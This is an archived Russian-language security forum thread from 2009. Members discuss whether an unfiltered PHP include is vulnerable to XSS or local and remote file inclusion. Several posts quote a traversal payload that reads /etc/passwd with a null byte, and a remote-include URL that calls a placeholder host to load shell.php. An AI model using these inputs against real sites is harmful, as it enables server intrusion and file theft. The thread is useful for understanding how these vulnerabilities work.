HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.04.2009, 19:12
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Цитата:
Сообщение от Pashkela  
Это вообще небезопасно, если честно. Фильтровать обязательно. Хотя бы от XSS (вообще-то)
Фильтровать-то обязательно надо - понятно, а каким образом там появятся XSS ?
 
Ответить с цитированием

  #2  
Старый 23.04.2009, 19:13
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от Pashkela  
Это вообще небезопасно, если честно. Фильтровать обязательно. Хотя бы от XSS (вообще-то)
Если несложно,покажи пример как провести ксс с этим куском кода.(в позновательных целях)
 
Ответить с цитированием

  #3  
Старый 23.04.2009, 19:14
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Цитата:
Сообщение от m0Hze  
Если несложно,покажи пример как провести ксс с этим куском кода.(в позновательных целях)
+1, тоже стало интересно.
 
Ответить с цитированием

  #4  
Старый 23.04.2009, 19:20
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от DDoSька  
+1, тоже стало интересно.
Ну вот тут почитайте, например:

http://www.virtuax.be/fztr/index.php?title=XSS_Intraframe_Logger

и тут кое-что:

http://securityvulns.ru/Tdocument29.html

а также LFI (PHP-inj):

http://n0ns3ns3.livejournal.com/219202.html (ctrl+f "include")

Последний раз редактировалось Pashkela; 23.04.2009 в 19:27..
 
Ответить с цитированием

  #5  
Старый 23.04.2009, 19:27
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Цитата:
Сообщение от Pashkela  
Ну вот тут почитайте, например:

http://www.virtuax.be/fztr/index.php?title=XSS_Intraframe_Logger

и тут кое-что:

http://securityvulns.ru/Tdocument29.html
Мы хотели пример на данном куске кода выше, который показа nilux
/index.php?page=http://hacker.com/shell.php).
В скрипте nilux`не проинклудилось бы

Последний раз редактировалось DDoSька; 23.04.2009 в 19:30..
 
Ответить с цитированием

  #6  
Старый 23.04.2009, 19:15
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Подскажите функцию которая определяет есть ли кусочек слова (к примеру в $_GET['my_get'])(не путайте с проверкой целой части слов)
Если есть кусочек слова то выводил что нибуть

зы Pashkela тоже интересно насчет XSS
 
Ответить с цитированием

  #7  
Старый 23.04.2009, 19:17
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

strpos,stripos,preg_match,array_search,in_array
 
Ответить с цитированием

  #8  
Старый 23.04.2009, 19:35
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

2 DDoSька:

это врядли можно продемонстрировать полноценно, когда выложено только:

PHP код:
include("page".$GET['id'].".php"); 
Чтобы понять, что тут КОНКРЕТНЫЙ LFI, просто прочтите то, чему вы поверите:

http://forum.antichat.ru/thread23501.html

и не надо меня впредь просить искать уязвимость в коде:

PHP код:
$a $a+1
остальной код (скрытый) имеет значение, для демонстрации уязвимости, когда просят именно так - "нет ты скажи, как именно здесь можно всё похерить"

Цитата:
/index.php?page=http://hacker.com/shell.php).
В скрипте nilux`не проинклудилось бы
а я не говорил о RFI, тут LFI, что очень часто достаточно

т.е. например:

/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00 очень даже просто могло бы, при определенных обстоятельствах, дать свои плоды

Последний раз редактировалось Pashkela; 23.04.2009 в 19:38..
 
Ответить с цитированием

  #9  
Старый 23.04.2009, 19:47
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Не то
 
Ответить с цитированием

  #10  
Старый 23.04.2009, 19:51
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Цитата:
Сообщение от m0Hze  
Не то
Это точно , от xss от отшли к php-inc
да и там "page1.php"
page/../../config.php , разве даст плоды?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 5421 21.04.2026 07:37
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ